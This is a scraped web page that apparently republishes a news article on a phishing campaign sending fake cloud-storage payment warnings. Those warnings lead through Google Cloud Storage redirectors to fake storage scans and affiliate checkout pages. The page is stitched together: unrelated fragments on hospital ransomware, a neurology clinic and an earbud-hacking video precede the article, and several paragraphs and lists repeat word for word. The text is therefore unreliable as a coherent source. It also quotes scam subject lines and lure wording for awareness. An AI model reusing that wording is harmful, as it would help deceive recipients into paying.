Ransomware attacks on US hospitals, clinics, and other care providers can steal data and lock down infected computer systems. They can cripple critical systems and endanger the health, privacy, and security of patients. Infected hospitals and clinics must pay a ransom or face extended downtime, data loss, and putting patients and staff at increased risk. Hospitals and clinics might resort to pen and paper, cancel appointments, and divert patients elsewhere until systems are restored.
About Neurological Associates of Washington
Neurological Associates of Washington is a neurologist clinic located in the Seattle suburb of Kirkland, Washington.
Your Earbuds can Spy on You - Bluetooth Hacks & AI Attacks Explained
Cloud Storage Payment Scam Floods Inboxes with Fake Renewals
By Lawrence Abrams for bleepingcomputer
bleepingcomputer
Over the past few months, a large-scale cloud storage subscription scam campaign has been targeting users worldwide with repeated emails falsely warning recipients that their photos, files, and accounts are about to be blocked or deleted due to an alleged payment failure.
Based on numerous emails seen by BleepingComputer, the campaign has escalated over the past few months, with people receiving multiple versions of the scam each day, all appearing to be sent by the same scammers.
While the email text, the messages all attempt to create a sense of urgency by claiming a payment problem or storage issue must be resolved immediately, or people's files will be deleted or blocked.
The cloud storage scam email campaign
The phishing emails originate from a wide range of domains, with most appearing to be randomly generated for the spam campaign, as shown in the sample list below:
[email protected]
[email protected]
[email protected]
[name][email protected]
The emails themselves use a wide variety of subject lines, all designed to scare a recipient into opening the email.
Example subject lines seen by BleepingComputer include:
Many of the subject lines are personalized with the recipient's name or email address and include specific dates or identifiers to increase urgency and make the messages appear legitimate.
The email seen by BleepingComputer claim that a cloud subscription renewal failed or that a payment method has expired, with recipients warned that backups may stop syncing and that photos, videos, documents, and device backups could be lost if the issue is not resolved.
Based on numerous emails seen by BleepingComputer, the campaign has escalated over the past few months, with people receiving multiple versions of the scam each day, all appearing to be sent by the same scammers.
While the email text, the messages all attempt to create a sense of urgency by claiming a payment problem or storage issue must be resolved immediately, or people's files will be deleted or blocked.
The cloud storage scam email campaign
The phishing emails originate from a wide range of domains, with most appearing to be randomly generated for the spam campaign, as shown in the sample list below:
[email protected]
[email protected]
[email protected]
[name][email protected]
The emails themselves use a wide variety of subject lines, all designed to scare a recipient into opening the email.
Example subject lines seen by BleepingComputer include:
- Immediate Action Required. Payment Declined
- Cloud Storage 1TB: Payment overdue
- [personal name]¸Your Account Has been Blocked! Your Photos and Videos will be Removed Fri,30 Jan-2026. take action!!
- We've blocked your account! Your photos and videos will be deleted . Renew your subscription for free now!
- [personal name] - Your store is full , click to check and save 80% , ID#88839
- [personal name], Your Cloud Account has been locked on Mon,26 Jan-2026. Your photos and videos will be removed!
- Sorry [<personal email address>], We Have To Suspend Your Account Today ! Sat,24 Jan-2026
- [name] - Your store is full , click to check and save 80%
- Cloud Storage 1TB: Payment overdue
Many of the subject lines are personalized with the recipient's name or email address and include specific dates or identifiers to increase urgency and make the messages appear legitimate.
The email seen by BleepingComputer claim that a cloud subscription renewal failed or that a payment method has expired, with recipients warned that backups may stop syncing and that photos, videos, documents, and device backups could be lost if the issue is not resolved.
One of the many cloud storage lockout emails being sent worldwide. Source: BleepingComputer
The emails seen by BleepingComputer claim that a cloud subscription renewal failed or that a payment method has expired, and warn recipients that backups may stop syncing and that photos, videos, documents, and device backups could be lost if the issue is not resolved.
The messages frequently include made-up account IDs, subscription numbers, and expiration dates to add legitimacy.
"Your Cloud Subscription Is at Risk. We couldn't process your most recent payment. If not resolved, your Cloud storage and backups may be paused," reads an email seen by BleepingComputer.
"Immediate Action Required Please verify or update your payment method as soon as possible to avoid losing access to your photos, files, and device backups."
All spam emails in this campaign contained a link to https://storage.googleapis.com/, which is part of Google Cloud Storage, where threat actors hosted static redirector HTML files. When a visitor clicks this, the URL redirects them to a scam/phishing site hosted on random domains.
All of the links tested by BleepingComputer lead to the same set of scam pages.
The phishing pages impersonate cloud service portals and prominently display cloud-themed branding, including the Google Cloud logo. The web pages claim the user's cloud storage is full and warn that photos, videos, contacts, files, and private data are no longer being backed up and will be deleted.
"Because you've exceeded your storage plan, your documents, contacts, and device data are no longer backing up to Cloud and your photos and videos are not uploading to Cloud Photos. Cloud Drive and Cloud-enabled apps are not updating across your devices," reads the phishing site shown below.
"Your data will be lost without security protection if no urgent action is taken."
Phishing page warns that your cloud storage is full. Source: BleepingComputer
Clicking on the "Continue" button brings targets to a fake storage scan that always reports that Photos, Cloud Drive, and Mail are all full. The pages then warn that data will be lost unless the cloud storage is upgraded, claiming that the person is eligible for a limited-time "loyalty" upgrade at an 80% discount.
However, after clicking the update storage button, instead of being taken to a legitimate cloud services page, you are redirected to affiliate marketing pages promoting unrelated products.
Products promoted in this phishing campaign include VPN services, little-known security software, and other subscription-based offerings with no connection to cloud storage.
The pages ultimately lead to checkout forms designed to collect credit card details and generate affiliate revenue for the threat actors behind the campaign.
Unfortunately, many people who receive these emails may not realize they're scams and purchase a product they don't need, thinking it will solve the fake cloud storage issues.
It is important to understand that these emails and landing pages are not legitimate cloud service notifications. Furthermore, legitimate cloud providers do not send emails that lead to storage scans or 3rd-party security or VPN products to resolve billing issues.
Furthermore, most legitimate cloud storage providers will block access to your additional storage when you fail to make a payment, rather than deleting your files immediately.
For example, Google says that if a Google Drive plan is canceled, you will lose access to your additional storage until you make a payment again, and your files will only be deleted after 2 years.
Microsoft OneDrive follows a similar approach but says it may delete files after 6 months if the account exceeds its allocated storage.
Users who receive these spam messages should delete them without clicking any links and not purchase anything promoted through the emails.
As the campaign's goal is to scare recipients into unnecessary purchases, ignoring these messages is the best course of action.
Any concerns about cloud storage or billing should instead be checked manually by visiting the official website or app of the legitimate cloud service.
© vocalbits.com